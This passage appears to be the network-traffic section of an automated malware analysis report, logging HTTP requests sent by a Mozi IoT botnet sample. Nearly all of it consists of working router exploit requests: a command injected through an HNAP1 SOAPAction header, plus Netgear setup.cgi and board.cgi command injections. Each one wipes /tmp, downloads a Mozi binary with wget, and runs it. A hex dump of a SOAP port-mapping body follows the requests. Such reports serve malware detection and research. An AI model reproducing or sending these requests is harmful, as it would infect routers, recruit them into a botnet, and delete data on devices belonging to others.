xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.208.233.170:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
Source: global traffic | HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii: |